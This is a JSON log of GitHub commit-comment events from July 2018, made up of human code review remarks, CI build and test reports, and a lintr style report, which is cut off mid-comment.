{"id":"8040383859","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29894148,"position":15,"line":14,"path":"src/otrng_mackey.c","commit_id":"ac3f54e8cb252b46f9bd450ab3ade3b62b0060ec","created_at":"2018-07-30T21:25:43Z","updated_at":"2018-07-30T21:25:43Z","author_association":"MEMBER","body":"This is now repeated on the branch @annacruz is working on"}},"created_at":"2018-07-30T21:25:43Z"}
{"id":"8040385505","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29894152,"position":3,"line":3,"path":"src/otrng_modify.c","commit_id":"5f842ad24961e03419473f292b80890ddcef91d3","created_at":"2018-07-30T21:26:05Z","updated_at":"2018-07-30T21:26:05Z","author_association":"MEMBER","body":"This is now repeated on the branch @deniscostadsc  is working on"}},"created_at":"2018-07-30T21:26:05Z"}
{"id":"8040386088","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29894153,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-30T21:26:13Z","updated_at":"2018-07-30T21:26:13Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T21:26:13Z"}
{"id":"8040387511","type":"CommitCommentEvent","actor":{"login":"vak2ve"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29894155,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T21:26:31Z","updated_at":"2018-07-30T21:26:31Z","author_association":"CONTRIBUTOR","body":"@WaxCylinderRevival For press clippings or other bracketed content tagged as heads that have dateline information included, I've been substituting a centered dateline and the head either [Untitled] or logical head content depending on the following text. However I see I haven't been very consistent about it and there are still examples of both in the 1868 volumes. From 1868p2\r\n\r\n```\r\n`<head>[From the Diario Oficial, of May 9, 1868.—Translation.]</head>\r\n<dateline>[<date when=\"1868-05-19\" ana=\"#date_undated-inferred-from-document-head\"  calendar=\"gregorian\">May 9, 1868</date>]</dateline>\r\n <p rend=\"center\">Department of Foreign Relations.</p>`\r\n```\r\n\r\nwould be\r\n\r\n```\r\n<opener><dateline rendition=\"#center\">[From the Diario Oficial, of <date when=\"1868-05-19\" calendar=\"gregorian\">May 9, 1868</date>.—Translation.]</dateline></opener>\r\n                            <head>Department of Foreign Relations.</head>\r\n```\r\n\r\nAre you saying you'd prefer I leave it and cases like that as in the first version, with dates marked by @ana values? \r\n"}},"created_at":"2018-07-30T21:26:31Z"}
{"id":"8040389126","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29894156,"position":null,"line":null,"path":null,"commit_id":"bf4326d4d97c3998c3771ff367df43740c184baf","created_at":"2018-07-30T21:26:52Z","updated_at":"2018-07-30T21:26:52Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2941 of 2954 tests passed, 1 test warnings)\n\nMessages:\n\n * 14 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 11 tests had: ESO big diffs.\n * 12 tests had: Table big diffs.\n * 8 tests had: MTR big diffs.\n * 3 tests had: ESO small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 611\n * Failed: 13\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.56%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T21:26:52Z"}
{"id":"8040391018","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29894161,"position":28,"line":86,"path":"BankManagement/BankManagement/bankAPI.c","commit_id":"7ee11b749eb521f1c211f0331d0af51ab6455185","created_at":"2018-07-30T21:27:17Z","updated_at":"2018-07-30T21:27:17Z","author_association":"NONE","body":"withdraw_money and deposit_money have the same code. BAD! FIX IT! read about DRY = DONT REPEAT YOURSELFT!"}},"created_at":"2018-07-30T21:27:17Z"}
{"id":"8040391123","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29894163,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-30T21:27:18Z","updated_at":"2018-07-30T21:27:18Z","author_association":"NONE","body":"@damarlas Try creating a new migration and have a look at what changes are being made.\r\n\r\n@SaintHellcom Can you provide the error description?"}},"created_at":"2018-07-30T21:27:18Z"}
{"id":"8040391943","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894165,"position":5,"line":5,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:27:29Z","updated_at":"2018-07-30T21:27:29Z","author_association":"MEMBER","body":"Tohle je OK, jen kdyz je jen jedna webpage, tak je lepsi to napsat primo jako:\r\n```yaml\r\nweb: https://www.cardanohub.org/\r\n```"}},"created_at":"2018-07-30T21:27:29Z"}
{"id":"8040392226","type":"CommitCommentEvent","actor":{"login":"JoelKatz"},"repo":{"name":"nbougalis/rippled"},"payload":{"comment":{"id":29894167,"position":4,"line":41,"path":"src/ripple/protocol/JsonFields.h","commit_id":"f35f8fd94b6638d8198f8daff15f4246b4a9f18f","created_at":"2018-07-30T21:27:33Z","updated_at":"2018-07-30T21:27:33Z","author_association":"NONE","body":"I don't think this is ever used."}},"created_at":"2018-07-30T21:27:33Z"}
{"id":"8040393799","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894172,"position":19,"line":19,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:27:54Z","updated_at":"2018-07-30T21:27:54Z","author_association":"MEMBER","body":"Tady chybi url exploreru"}},"created_at":"2018-07-30T21:27:54Z"}
{"id":"8040396308","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29894177,"position":8,"line":7,"path":"BankManagement/BankManagement/userdata.h","commit_id":"7ee11b749eb521f1c211f0331d0af51ab6455185","created_at":"2018-07-30T21:28:31Z","updated_at":"2018-07-30T21:28:31Z","author_association":"NONE","body":"why? "}},"created_at":"2018-07-30T21:28:31Z"}
{"id":"8040396457","type":"CommitCommentEvent","actor":{"login":"GitHabits"},"repo":{"name":"GitHabits/hello-world"},"payload":{"comment":{"id":29894178,"position":null,"line":null,"path":null,"commit_id":"a33ff7f315cf452d6c963ec36db5e8249d459404","created_at":"2018-07-30T21:28:33Z","updated_at":"2018-07-30T21:28:33Z","author_association":"OWNER","body":"I enjoy the sight of something new. "}},"created_at":"2018-07-30T21:28:33Z"}
{"id":"8040399405","type":"CommitCommentEvent","actor":{"login":"wolfinpdx"},"repo":{"name":"Kozova1/Parsec-Integration-With-RetroPie"},"payload":{"comment":{"id":29894182,"position":null,"line":null,"path":null,"commit_id":"b5fcd5ad6f6e4dbcb6741d61d87cd9314c7c7b8f","created_at":"2018-07-30T21:29:11Z","updated_at":"2018-07-30T21:29:11Z","author_association":"NONE","body":"This is very cool. Works exactly as I expected. Any chance of this working with any RetroPie ES theme in the future? Right now, Carbon looks the best, but my preferred theme is Pixel. "}},"created_at":"2018-07-30T21:29:11Z"}
{"id":"8040400293","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29894184,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-30T21:29:23Z","updated_at":"2018-07-30T21:29:23Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2348 of 2348 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T21:29:23Z"}
{"id":"8040402685","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29894190,"position":51,"line":33,"path":"Lesson6HW/src/main/java/ru/otus/lesson6hw/config/Configurations.java","commit_id":"28e23bcba113b1b497e1b662dbcbb72cc40ede47","created_at":"2018-07-30T21:29:53Z","updated_at":"2018-07-30T21:29:53Z","author_association":"NONE","body":"Крутяк!"}},"created_at":"2018-07-30T21:29:53Z"}
{"id":"8040403123","type":"CommitCommentEvent","actor":{"login":"maxkfranz"},"repo":{"name":"cytoscape/cytoscape.js"},"payload":{"comment":{"id":29894192,"position":null,"line":null,"path":null,"commit_id":"f97ba5f3f881435f429d52211cb0ab073e45ff59","created_at":"2018-07-30T21:30:00Z","updated_at":"2018-07-30T21:30:00Z","author_association":"MEMBER","body":"Ref #1224 "}},"created_at":"2018-07-30T21:30:00Z"}
{"id":"8040403452","type":"CommitCommentEvent","actor":{"login":"GitHabits"},"repo":{"name":"GitHabits/hello-world"},"payload":{"comment":{"id":29894196,"position":null,"line":null,"path":null,"commit_id":"a33ff7f315cf452d6c963ec36db5e8249d459404","created_at":"2018-07-30T21:30:04Z","updated_at":"2018-07-30T21:30:04Z","author_association":"OWNER","body":"I think we should be going towards being a multi planetary species. "}},"created_at":"2018-07-30T21:30:04Z"}
{"id":"8040403535","type":"CommitCommentEvent","actor":{"login":"maxkfranz"},"repo":{"name":"cytoscape/cytoscape.js"},"payload":{"comment":{"id":29894197,"position":null,"line":null,"path":null,"commit_id":"560019b4e665972c02c19869c85a707b44fabe7d","created_at":"2018-07-30T21:30:05Z","updated_at":"2018-07-30T21:30:05Z","author_association":"MEMBER","body":"Ref #1224 "}},"created_at":"2018-07-30T21:30:05Z"}
{"id":"8040405068","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29894202,"position":11,"line":11,"path":"Lesson6HW/src/main/java/ru/otus/lesson6hw/config/DataSourceConfig.java","commit_id":"28e23bcba113b1b497e1b662dbcbb72cc40ede47","created_at":"2018-07-30T21:30:25Z","updated_at":"2018-07-30T21:30:25Z","author_association":"NONE","body":"Красота!"}},"created_at":"2018-07-30T21:30:25Z"}
{"id":"8040406302","type":"CommitCommentEvent","actor":{"login":"GitHabits"},"repo":{"name":"GitHabits/hello-world"},"payload":{"comment":{"id":29894204,"position":null,"line":null,"path":null,"commit_id":"a33ff7f315cf452d6c963ec36db5e8249d459404","created_at":"2018-07-30T21:30:40Z","updated_at":"2018-07-30T21:30:40Z","author_association":"OWNER","body":"I have written two comments. "}},"created_at":"2018-07-30T21:30:40Z"}
{"id":"8040406842","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29894205,"position":3,"line":52,"path":"BankManagement/BankManagement/bankAPI.c","commit_id":"7ee11b749eb521f1c211f0331d0af51ab6455185","created_at":"2018-07-30T21:30:48Z","updated_at":"2018-07-30T21:30:48Z","author_association":"NONE","body":"it's bad the you use sometimes \r\nif (foo)\r\n         Something();\r\n\r\nif (foo) Something();\r\n\r\nyou the first way!\r\n"}},"created_at":"2018-07-30T21:30:48Z"}
{"id":"8040412839","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29894223,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T21:32:11Z","updated_at":"2018-07-30T21:32:11Z","author_association":"MEMBER","body":"I prefer the second `opener/dateline` + `<head>Untitled</head>` but I didn't want to tread too much on changing your encoding when the content was wrapped in `head`!  \r\n\r\nI think the existing `<opener><dateline rendition=\"#center\">` are great and I've been itching to regularize.  If you think it works for your schedule to implement this normalization across q3 to `opener/dateline` + `<head>Untitled</head>`, I'm in full support as it seems more accurate, both semantically and format-wise, and allows us to write stricter guidelines for future batches.  (If you'd like me to convert them instead, just let me know.)"}},"created_at":"2018-07-30T21:32:11Z"}
{"id":"8040417931","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29894243,"position":3,"line":3,"path":"src/otrng_modify.c","commit_id":"5f842ad24961e03419473f292b80890ddcef91d3","created_at":"2018-07-30T21:33:20Z","updated_at":"2018-07-30T21:33:20Z","author_association":"CONTRIBUTOR","body":"We know that and decided that the first one to finish and commits to master will put in the helpers and the other one should rebase before merge into master"}},"created_at":"2018-07-30T21:33:20Z"}
{"id":"8040419163","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29894247,"position":31,"line":31,"path":"hw2/src/main/java/ru/otus/hw2/Main.java","commit_id":"f20a365a94f6bd2bd70a1b1d70ef1172c3ba2598","created_at":"2018-07-30T21:33:38Z","updated_at":"2018-07-30T21:33:38Z","author_association":"NONE","body":"Ну хотелось бы, конечно, в main получить один бин и вызвать один метод)"}},"created_at":"2018-07-30T21:33:38Z"}
{"id":"8040419362","type":"CommitCommentEvent","actor":{"login":"KapiX"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29894248,"position":65,"line":60,"path":"dev-util/mdds/mdds-1.3.1.recipe","commit_id":"68e88ad2b23801fcec1e8105b9118a2d04e290b1","created_at":"2018-07-30T21:33:40Z","updated_at":"2018-07-30T21:33:40Z","author_association":"MEMBER","body":"Why did you remove this section? All pkgconfig .pc files are in develop/lib."}},"created_at":"2018-07-30T21:33:40Z"}
{"id":"8040419837","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29894250,"position":15,"line":15,"path":"hw2/src/main/java/ru/otus/hw2/Main.java","commit_id":"f20a365a94f6bd2bd70a1b1d70ef1172c3ba2598","created_at":"2018-07-30T21:33:47Z","updated_at":"2018-07-30T21:33:47Z","author_association":"NONE","body":"Крутяк)"}},"created_at":"2018-07-30T21:33:47Z"}
{"id":"8040421780","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29894255,"position":33,"line":33,"path":"hw2/src/main/java/ru/otus/hw2/config/AppConfig.java","commit_id":"f20a365a94f6bd2bd70a1b1d70ef1172c3ba2598","created_at":"2018-07-30T21:34:14Z","updated_at":"2018-07-30T21:34:14Z","author_association":"NONE","body":"Хитро) Но луче просто студента написать в параметры метода, и спринг Вам сам его туда подставит."}},"created_at":"2018-07-30T21:34:14Z"}
{"id":"8040423294","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29894262,"position":8,"line":8,"path":"hw2/src/main/java/ru/otus/hw2/model/Answers.java","commit_id":"f20a365a94f6bd2bd70a1b1d70ef1172c3ba2598","created_at":"2018-07-30T21:34:34Z","updated_at":"2018-07-30T21:34:34Z","author_association":"NONE","body":"А это лучше поместить в файл)"}},"created_at":"2018-07-30T21:34:34Z"}
{"id":"8040425023","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29894268,"position":9,"line":9,"path":"hw2/src/main/java/ru/otus/hw2/service/LocalizeService.java","commit_id":"f20a365a94f6bd2bd70a1b1d70ef1172c3ba2598","created_at":"2018-07-30T21:34:57Z","updated_at":"2018-07-30T21:34:57Z","author_association":"NONE","body":"Я бы просто поставил бы сюда аннотацию `@Service`"}},"created_at":"2018-07-30T21:34:57Z"}
{"id":"8040425258","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29894270,"position":null,"line":null,"path":null,"commit_id":"d871a503f52d8ebe68adaf9d8a001e9bf8f25d1a","created_at":"2018-07-30T21:34:59Z","updated_at":"2018-07-30T21:34:59Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/34/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/34//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/d871a503f52d8ebe68adaf9d8a001e9bf8f25d1a/34/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/d871a503f52d8ebe68adaf9d8a001e9bf8f25d1a/34/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/d871a503f52d8ebe68adaf9d8a001e9bf8f25d1a/34/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/master/d871a503f52d8ebe68adaf9d8a001e9bf8f25d1a/34/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>18 tests failed, 0 tests skipped, 207 tests passed.</summary>\n\n## Failed tests\n\n * apitest/Mac Classic/All: TimedOut (Execution timed out after 1200 seconds.)\n * introspection/iOS Unified 32-bits - simulator/Debug: BuildFailure\n * dont link/iOS Unified 32-bits - simulator/Debug: BuildFailure\n * dont link/iOS Unified 32-bits - simulator/Release: BuildFailure\n * link all/iOS Unified 32-bits - simulator/Debug: BuildFailure\n * link all/iOS Unified 32-bits - simulator/Release: BuildFailure\n * link sdk/iOS Unified 32-bits - simulator/Debug: BuildFailure\n * link sdk/iOS Unified 32-bits - simulator/Release: BuildFailure\n * introspection/iOS Unified 64-bits - simulator/Debug: BuildFailure\n * dont link/iOS Unified 64-bits - simulator/Debug: BuildFailure\n * dont link/iOS Unified 64-bits - simulator/Release: BuildFailure\n * link all/iOS Unified 64-bits - simulator/Debug: BuildFailure\n * link all/iOS Unified 64-bits - simulator/Release: BuildFailure\n * link sdk/iOS Unified 64-bits - simulator/Debug: BuildFailure\n * link sdk/iOS Unified 64-bits - simulator/Release: BuildFailure\n * monotouch-test/watchOS - simulator/Debug: Failed\n * link all/watchOS - simulator/Debug: Failed\n * MTouch tests/NUnit: TimedOut (Execution timed out after 0 minutes.)\n</details>\n"}},"created_at":"2018-07-30T21:34:59Z"}
{"id":"8040427598","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"thatfella/Homeworks"},"payload":{"comment":{"id":29894275,"position":1,"line":1,"path":"hw2/src/main/resources/properties.properties","commit_id":"f20a365a94f6bd2bd70a1b1d70ef1172c3ba2598","created_at":"2018-07-30T21:35:31Z","updated_at":"2018-07-30T21:35:31Z","author_association":"NONE","body":"Аболютные нельзя ставить и ссылки на src - тоже. Запуская jar - счиатйте что их нет."}},"created_at":"2018-07-30T21:35:31Z"}
{"id":"8040434070","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894287,"position":27,"line":27,"path":"Main/src/TaskManager/ConsoleMenu.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:36:58Z","updated_at":"2018-07-30T21:36:58Z","author_association":"NONE","body":"Не обязательно инициировать boolean поле значением false (это значение по умолчанию)"}},"created_at":"2018-07-30T21:36:58Z"}
{"id":"8040434581","type":"CommitCommentEvent","actor":{"login":"jomatruva"},"repo":{"name":"jomatruva/polysomni-captAnalz"},"payload":{"comment":{"id":29894290,"position":null,"line":null,"path":null,"commit_id":"b96e6116342bcff3ba33588bc76f6e615de40a3b","created_at":"2018-07-30T21:37:05Z","updated_at":"2018-07-30T21:37:05Z","author_association":"OWNER","body":"This is a project book on how to build an Arduino based app for laboratory work on electrophysiology.\n\nIt contains three scketchs. First for CSV data from six channels of Arduino uno. Second for same thing but binary data. Third a real time and levels, Signal emulador,  for the above measuring gadgets. Schematics for two shields and the programs for data storage and graphics displays. \n\nThe purpose is to provide a platform for design and realization of educational exercises in polysignal \nMeasurements. \n"}},"created_at":"2018-07-30T21:37:05Z"}
{"id":"8040436098","type":"CommitCommentEvent","actor":{"login":"e13mort"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29894294,"position":30,"line":30,"path":"Main/src/TaskManager/ConsoleMenu.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T21:37:27Z","updated_at":"2018-07-30T21:37:27Z","author_association":"NONE","body":"Скорее всего можно обойтись одним сканнером."}},"created_at":"2018-07-30T21:37:27Z"}
{"id":"8040437854","type":"CommitCommentEvent","actor":{"login":"abankrah"},"repo":{"name":"abankrah/Data_Science_Assignment_11.11287_Matplotlib"},"payload":{"comment":{"id":29894301,"position":null,"line":null,"path":null,"commit_id":"6a3b339848af1a4609589b73a75a6adadba2d71f","created_at":"2018-07-30T21:37:50Z","updated_at":"2018-07-30T21:37:50Z","author_association":"OWNER","body":"![question 1](https://user-images.githubusercontent.com/39193389/43425012-458a4d0e-941f-11e8-9486-54c1226ab06f.PNG)\r\n![question 2](https://user-images.githubusercontent.com/39193389/43425014-459f99a2-941f-11e8-9c75-628951a70d6f.PNG)\r\n"}},"created_at":"2018-07-30T21:37:50Z"}
{"id":"8040438027","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29894302,"position":3,"line":3,"path":"src/otrng_modify.c","commit_id":"5f842ad24961e03419473f292b80890ddcef91d3","created_at":"2018-07-30T21:37:52Z","updated_at":"2018-07-30T21:37:52Z","author_association":"MEMBER","body":"Ok, but this can be solved by only using master. We can talk about this on the next meeting of the toolkit. "}},"created_at":"2018-07-30T21:37:52Z"}
{"id":"8040439770","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"End-to-end-provenance/RDataTracker"},"payload":{"comment":{"id":29894313,"position":null,"line":null,"path":null,"commit_id":"ab8872f572c2469067712b458d61795e97b7375f","created_at":"2018-07-30T21:38:14Z","updated_at":"2018-07-30T21:38:14Z","author_association":"NONE","body":"[R/Annotation.R:52:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L52) *style:* **Lines should not be more than 90 characters.**\n```r\n​#' @param graphic.fext (optional) the file extension for a graphics file, defaults to jpeg.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:56:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n^~~~~~~~~~~~\n```\n[R/Annotation.R:56:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n                         ^~~~~~~~~~~~\n```\n[R/Annotation.R:56:45:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.function <- function(outs.graphic=NULL, outs.data=NULL, \n                                            ^~~~~~~~~\n```\n[R/Annotation.R:57:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                         ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:57:47:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                                              ^~~~~~~~\n```\n[R/Annotation.R:57:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L57) *style:* **Variable or function name should be snake_case.**\n```r\n​                         outs.exception=NULL, outs.url=NULL, outs.file=NULL, \n                                                             ^~~~~~~~~\n```\n[R/Annotation.R:58:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L58) *style:* **Variable or function name should be snake_case.**\n```r\n​                         graphic.fext=\"jpeg\") {\n                         ^~~~~~~~~~~~\n```\n[R/Annotation.R:75:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L75) *style:* **Variable or function name should be snake_case.**\n```r\n​  full.call <- tryCatch (match.call(sys.function(-1), call=call),\n  ^~~~~~~~~\n```\n[R/Annotation.R:75:25:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L75) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  full.call <- tryCatch (match.call(sys.function(-1), call=call),\n                        ^\n```\n[R/Annotation.R:79:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L79) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.create.start.for.cur.cmd (call)\n                                ^\n```\n[R/Annotation.R:102:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L102) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:102:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L102) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n                             ^\n```\n[R/Annotation.R:102:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L102) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.return.value <- function (expr=NULL, cmd.func=NULL) {\n                                         ^~~~~~~~\n```\n[R/Annotation.R:107:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L107) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.stmt <- NULL\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:110:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L110) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.stmt <- cmd.func()\n    ^~~~~~~~~~~\n```\n[R/Annotation.R:114:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L114) *style:* **Variable or function name should be snake_case.**\n```r\n​  orig.expr <- substitute(expr)\n  ^~~~~~~~~\n```\n[R/Annotation.R:118:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L118) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.num <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~\n```\n[R/Annotation.R:121:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L121) *style:* **Variable or function name should be snake_case.**\n```r\n​  orig.return <- paste(\"return(\", deparse(orig.expr), \")\", sep=\"\")\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:131:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L131) 